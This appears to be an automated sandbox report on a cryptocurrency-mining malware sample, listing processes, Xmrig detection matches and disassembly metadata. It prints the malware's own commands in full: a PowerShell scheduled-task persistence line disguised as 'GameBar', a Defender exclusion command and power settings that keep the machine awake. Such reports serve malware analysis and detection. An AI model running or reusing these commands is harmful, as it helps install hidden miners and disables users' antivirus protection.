Analysis Process: powershell.exePID: 484, Parent PID: 3452

General

Target ID:	39
Start time:	02:10:50
Start date:	23/05/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cgwzt#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GameBar' /tr '''C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GameBar' -User 'System' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff6cbac0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: conhost.exePID: 7252, Parent PID: 484

General

Target ID:	40
Start time:	02:10:51
Start date:	23/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 968, Parent PID: 5196

General

Target ID:	41
Start time:	02:10:51
Start date:	23/05/2023
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-dc 0
Imagebase:	0x7ff640370000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 7108, Parent PID: 5196

General

Target ID:	42
Start time:	02:10:51
Start date:	23/05/2023
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-ac 0
Imagebase:	0x7ff640370000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 5624, Parent PID: 5196

General

Target ID:	43
Start time:	02:10:52
Start date:	23/05/2023
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff640370000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3680, Parent PID: 3452

General

Target ID:	46
Start time:	02:11:22
Start date:	23/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\conhost.exe
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 7580, Parent PID: 3452

General

Target ID:	47
Start time:	02:11:23
Start date:	23/05/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff6cbac0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7444, Parent PID: 7580

General

Target ID:	48
Start time:	02:11:23
Start date:	23/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: dwm.exePID: 7664, Parent PID: 3452

General

Target ID:	49
Start time:	02:11:25
Start date:	23/05/2023
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dwm.exe
Imagebase:	0x7ff695af0000
File size:	62464 bytes
MD5 hash:	70073A05B2B43FFB7A625708BB29E7C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000031.00000002.672175121.0000017AF520B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000031.00000002.672316897.0000017AF5240000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000031.00000002.672316897.0000017AF524F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 2496, Parent PID: 3452

General

Target ID:	50
Start time:	02:11:29
Start date:	23/05/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lmcqiiob#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GameBar' /tr '''C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GameBar' -User 'System' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff6cbac0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1840, Parent PID: 2496

General

Target ID:	51
Start time:	02:11:33
Start date:	23/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: GameBar.exePID: 7908, Parent PID: 1080

General

Target ID:	54
Start time:	02:12:01
Start date:	23/05/2023
Path:	C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe
Wow64 process (32bit):
Commandline:	C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe
Imagebase:
File size:	6132520 bytes
MD5 hash:	8EFB0A8FD404D31541B7592CAE776E58
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: powershell.exePID: 7344, Parent PID: 3452COMMON

Executed Functions

Function 00007FFBAC259885 Relevance: .7, Instructions: 726COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.460697859.00007FFBAC250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac250000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2e7c451ce6d53b0fa1d66ac70b89d549969cb5beb6bba8d020805be179c7c99
Instruction ID: 1827af3aeff69f5778b9ac345c4911e6b9cea5cf723b6ff79868f893e275c0ab
Opcode Fuzzy Hash: c2e7c451ce6d53b0fa1d66ac70b89d549969cb5beb6bba8d020805be179c7c99
Instruction Fuzzy Hash: F132A4B0A18B4D8FDB99EF1CC495AAAB7E1FF59310F14016DD44AC7296CA25EC42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC251DD6 Relevance: .6, Instructions: 606COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.460697859.00007FFBAC250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac250000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9af2736af90fb172bb04bd27b831466b1d8ee70e557242d51cc6813f0367059
Instruction ID: b881f6f10ee4aabb205887dad455c6cf74cb4406761d55cd4e7e4d24ca535a70
Opcode Fuzzy Hash: f9af2736af90fb172bb04bd27b831466b1d8ee70e557242d51cc6813f0367059
Instruction Fuzzy Hash: 2D0258B061DB4D4FE74AEB28C458AB67BE1EF96314F1400BDD48AC7297DA29EC42C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC314905 Relevance: .6, Instructions: 564COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.460938835.00007FFBAC310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac310000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7ecd21e6d47d8dd6da486c555eb8f8c584e7d467829c2c01d837748d886a755
Instruction ID: df79ad5f8890aef8c84eaeb52fe3e9ce14be2e926eaf7c147d4f861dd5a74863
Opcode Fuzzy Hash: d7ecd21e6d47d8dd6da486c555eb8f8c584e7d467829c2c01d837748d886a755
Instruction Fuzzy Hash: 500247B190DE895FEB5ADA288859AB17BE1DF86220F0901FFD44DC71A3DE28DC06C355

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC25A955 Relevance: .5, Instructions: 483COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.460697859.00007FFBAC250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac250000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1a8154ce42c7973516f4a6124141bef41987a048c39bb0a8801c5b0715ceabc
Instruction ID: 9c05bad30a5c379e4e532dbdc847f9931a6fddc69d4d0c52209fb095212e610d
Opcode Fuzzy Hash: f1a8154ce42c7973516f4a6124141bef41987a048c39bb0a8801c5b0715ceabc
Instruction Fuzzy Hash: 96E1B471A09A4D8FDB95EF6CC445AB97BE1FF69310F1441AAD409D7256CA34EC42CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC25197A Relevance: .5, Instructions: 480COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.460697859.00007FFBAC250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac250000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a00fca33d36fa1594996212a65e1862ba25be6b39c5ce3b9cc5c4a3c7aad758
Instruction ID: 893a785a39209d3d941b122c5e0d39563a727a48e2a9d23b5cfcbcdbbcc0f3a9
Opcode Fuzzy Hash: 3a00fca33d36fa1594996212a65e1862ba25be6b39c5ce3b9cc5c4a3c7aad758
Instruction Fuzzy Hash: 39E106B1909B4E8FEF56EB68C455AEA7BE1FF54310F04017AC40AD7296DA28EC46C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC2544CD Relevance: .4, Instructions: 398COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.460697859.00007FFBAC250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac250000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eef2b57768c3d49b9f3e418cd2c7af4aeb00e9be48d4306c5745d4f3405634e
Instruction ID: 6ee8906d98f10a5aa0a60e5a9797d20e4db6092af5d6218f7164fe2ed2506efd
Opcode Fuzzy Hash: 3eef2b57768c3d49b9f3e418cd2c7af4aeb00e9be48d4306c5745d4f3405634e
Instruction Fuzzy Hash: C3D16171908A5D8FDB55EF6CC459AEAB7E1FF68300F144166D809D7296CE24EC46CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC25A01C Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.460697859.00007FFBAC250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac250000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db690a6b2dde28f1ec54aaf401eaaee2dbfea790af48b81f9cf3df773adab3a5
Instruction ID: 0e99328d7df8abad5d3355c1cbfadf8f9a2cd7888417d019856b8e56ac120285
Opcode Fuzzy Hash: db690a6b2dde28f1ec54aaf401eaaee2dbfea790af48b81f9cf3df773adab3a5
Instruction Fuzzy Hash: 3F8124B051CB498FE749EB28C496AB6BBE1EF55310F1004BDD08AC72A7DE69EC46C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC257B18 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.460697859.00007FFBAC250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac250000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6789f34080e4c0de95cb20f063460e67a61ba6f2743b88defc700a5c14399fd
Instruction ID: b5fbfce8b9d4821ea3da0c95756c114cd38c4632b22ca5e5eb82f835e5af2cbf
Opcode Fuzzy Hash: c6789f34080e4c0de95cb20f063460e67a61ba6f2743b88defc700a5c14399fd
Instruction Fuzzy Hash: 451148A581E7C98FD7439B349C291957FB0AF53215F0A01DBD888CB1B3E6299808C792

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC2520C2 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.460697859.00007FFBAC250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac250000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2cf379c336feaf6ecddd220621cf0cef5c856ba20257579572b436dd47a8035
Instruction ID: 338f62489b6f63beb0f408b4d64ac16c8b5bd7902a86b00de6a7122bb6bb48b9
Opcode Fuzzy Hash: c2cf379c336feaf6ecddd220621cf0cef5c856ba20257579572b436dd47a8035
Instruction Fuzzy Hash: 8D71D2B061CB4D4FE75AEB18C4986B6B7E1FFA4314F20047DD48AC329ADA69EC42C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC2571AB Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.460697859.00007FFBAC250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac250000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9282edca4de1e2f2fd1a83ceef68e8afb0bb6b420691ca8d5d31e136f179ce86
Instruction ID: 08c7d4722917b94471e6bda8b1f7b36e7a42d57b2aae2400091553e0e814ae8a
Opcode Fuzzy Hash: 9282edca4de1e2f2fd1a83ceef68e8afb0bb6b420691ca8d5d31e136f179ce86
Instruction Fuzzy Hash: 4531D67191CB4C8FDB18DB5CE80A6E97BE0FB99721F00422FE449D3252DA74A8558BC2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC25A99C Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.460697859.00007FFBAC250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac250000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af3c888218f2925ed30c11c23b252a3739c366e93ba679d7181cc1a0ae7a98d7
Instruction ID: 31bd0a07977dac1191794d6d5505cc4404cb0de00a739cfaa865e3eb805847d8
Opcode Fuzzy Hash: af3c888218f2925ed30c11c23b252a3739c366e93ba679d7181cc1a0ae7a98d7
Instruction Fuzzy Hash: E121D67160CA0D4FDB4CEA1CE84A9B577D1EB99320B1001AEE84AC7257DD66FC82C785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC257E88 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.460697859.00007FFBAC250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac250000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e07414142d6c3f9074de93e07bc310ff137df4fd9522c11b6eda8f4ae4830d1
Instruction ID: cc91a73442fc952b7ec3d2a0e50fdda2c80b8482cadf93182130a34bf50f65f1
Opcode Fuzzy Hash: 3e07414142d6c3f9074de93e07bc310ff137df4fd9522c11b6eda8f4ae4830d1
Instruction Fuzzy Hash: 1F21287090CB4C8FEB59DBACD84A7E97BE0EB95331F04422BD449C3152DA749856CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC31499F Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.460938835.00007FFBAC310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac310000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 600167de569a8294969e920232f65b2a29d734db6f8eb8b34391635d3d36e89f
Instruction ID: 3ff4e123caf165d3fb9f89e0bd0f52960344cd4ea6baf0854e7aa8a72f4c3cd7
Opcode Fuzzy Hash: 600167de569a8294969e920232f65b2a29d734db6f8eb8b34391635d3d36e89f
Instruction Fuzzy Hash: 0F2128E2D0EE475FEAA6C628C459A3466C1DF44311B5A11BBC94EC71E3CE28EC058749

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC314C8C Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.460938835.00007FFBAC310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac310000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e914165cf8e84d52f6c26cfaac3d6a78302cb3bccf6f7ce4070f05852829cbae
Instruction ID: 5929e2e79cd2c1d584390d26f314ec4034be0aa336bd690ccbd54934e0aa36e1
Opcode Fuzzy Hash: e914165cf8e84d52f6c26cfaac3d6a78302cb3bccf6f7ce4070f05852829cbae
Instruction Fuzzy Hash: 5B11E3B290E9556FEAA6D728D455A7467D0EF44320B1810FFD80EC7193DD24EC058344

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC3153E4 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.460938835.00007FFBAC310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac310000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abee33386937c50e199d5f43e04d46bc30e89e4658f1f4236c094ed67837f874
Instruction ID: 5fae71774fc9ff365b08b2a83bb34bd71880b0cf1f525933c8feeebaefd0ec23
Opcode Fuzzy Hash: abee33386937c50e199d5f43e04d46bc30e89e4658f1f4236c094ed67837f874
Instruction Fuzzy Hash: 3CF0123171CA044BE748EE1D9445665B7D1FBA8315F10852EE449C3655DA25E4818786

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC25162A Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.460697859.00007FFBAC250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffbac250000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f956504cda3ee5354a91ae7d3edd77f134f5313ead971c8ac627b8bca526b7cb
Instruction ID: 5ad583afbcf1f1c0dbc857d7ca9618a15d20dff7a747ef35ef531d8965e31fc7
Opcode Fuzzy Hash: f956504cda3ee5354a91ae7d3edd77f134f5313ead971c8ac627b8bca526b7cb
Instruction Fuzzy Hash: 5ED05B3171C8184FDF88FA1CB451AE57381D7943207140166D40AC6285DD16DC82C7C4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: conhost.exePID: 3680, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8.7%
Total number of Nodes:	1026
Total number of Limit Nodes:	9

Executed Functions

Function 00007FF67EED85D0 Relevance: 61.1, APIs: 17, Strings: 23, Instructions: 1102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF67EED871A
memset.MSVCRT ref: 00007FF67EED88AF
memset.MSVCRT ref: 00007FF67EED8A31
memset.MSVCRT ref: 00007FF67EED8AFA
memset.MSVCRT ref: 00007FF67EED8C9E
memset.MSVCRT ref: 00007FF67EED8E6D

Part of subcall function 00007FF67EEC2B40: wcslen.MSVCRT ref: 00007FF67EEC2B50

memset.MSVCRT ref: 00007FF67EED8FEF
memset.MSVCRT ref: 00007FF67EED90B8
_wcsicmp.MSVCRT ref: 00007FF67EED9436
memcpy.MSVCRT ref: 00007FF67EED9488
memcpy.MSVCRT ref: 00007FF67EED94AC

Part of subcall function 00007FF67EEC29A0: memset.MSVCRT ref: 00007FF67EEC29CE

memcpy.MSVCRT ref: 00007FF67EED961A
memcpy.MSVCRT ref: 00007FF67EED9642
memcpy.MSVCRT ref: 00007FF67EED9883
memcpy.MSVCRT ref: 00007FF67EED98AB

Strings

PROGRAMFILES=, xrefs: 00007FF67EED8F03
%S <#lmcqiiob#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highes, xrefs: 00007FF67EED962B, 00007FF67EED9663, 00007FF67EED96CC
SYSTEMROOT=, xrefs: 00007FF67EED8960
5RK\E, xrefs: 00007FF67EED8E72
%S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, xrefs: 00007FF67EED936C
\BaseNamedObjects\dogpaaynaoiaagc, xrefs: 00007FF67EED8641
e; }, xrefs: 00007FF67EED9674
\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe, xrefs: 00007FF67EED8D28, 00007FF67EED8E4B
PROGRAMFILES=, xrefs: 00007FF67EED8D84
\Google\Libs\, xrefs: 00007FF67EED8EA7, 00007FF67EED8FC5
eth, xrefs: 00007FF67EED9354
\BaseNamedObjects\dogpaaynaoiaagc, xrefs: 00007FF67EED8726
\reg.exe, xrefs: 00007FF67EED901A, 00007FF67EED908F
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GameBar, xrefs: 00007FF67EED9B2F, 00007FF67EED9B6B, 00007FF67EED9CDB
0, xrefs: 00007FF67EED8847
25.<&, xrefs: 00007FF67EED8EFC
\schtasks.exe, xrefs: 00007FF67EED90F2, 00007FF67EED9192
\System32, xrefs: 00007FF67EED88DA, 00007FF67EED8A0F
\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00007FF67EED8B73, 00007FF67EED8C75
\cmd.exe, xrefs: 00007FF67EED8A5E, 00007FF67EED8AD3
%S /run /tn "GameBar", xrefs: 00007FF67EED9750, 00007FF67EED97B3, 00007FF67EED9837
\BaseNamedObjects\wjsosmooouyuvnjx, xrefs: 00007FF67EED922A
xmr, xrefs: 00007FF67EED9365

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: memset$memcpy$wcslen$_wcsicmp
String ID: %S /run /tn "GameBar"$%S <#lmcqiiob#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highes$%S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force$0$25.<&$5RK\E$PROGRAMFILES=$PROGRAMFILES=$SYSTEMROOT=$\BaseNamedObjects\dogpaaynaoiaagc$\BaseNamedObjects\dogpaaynaoiaagc$\BaseNamedObjects\wjsosmooouyuvnjx$\Google\Libs\$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GameBar$\System32$\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\schtasks.exe$e; }$eth$xmr
API String ID: 1527338835-3429056698
Opcode ID: 8f89961d2736911de959abb50d3f10cd4f4321d70881bc96a6a1e6f21dc2e545
Instruction ID: f27fbfd4144c274e291d7cc1e0d22121a805ff41abf868e570bada3f4811d1fb
Opcode Fuzzy Hash: 8f89961d2736911de959abb50d3f10cd4f4321d70881bc96a6a1e6f21dc2e545
Instruction Fuzzy Hash: CCE23327D3CAC255F7129B39B4422F567A0AFB2384F445B31F98C926A2DFBE614D8304

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EEC1180 Relevance: 12.2, APIs: 8, Instructions: 195
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00007FF67EEC11E1
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF67EEC1253
malloc.MSVCRT ref: 00007FF67EEC1307
strlen.MSVCRT ref: 00007FF67EEC1329
malloc.MSVCRT ref: 00007FF67EEC1335
memcpy.MSVCRT ref: 00007FF67EEC1349
GetStartupInfoA.KERNEL32 ref: 00007FF67EEC1453

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
String ID:
API String ID: 649803965-0
Opcode ID: a8f23676dfa1b606fc91cff83539618099a44ae5dccc0297e4e43a440c2b021e
Instruction ID: e638ad7a5f4b280edd688784e667f77dbf80028994bfdd8bb771ec50eccb6e20
Opcode Fuzzy Hash: a8f23676dfa1b606fc91cff83539618099a44ae5dccc0297e4e43a440c2b021e
Instruction Fuzzy Hash: D0818B3BF28A4685FA659F55E44037D2BA1AF64788F444935FE0DC33A6DEADE8488300

Uniqueness
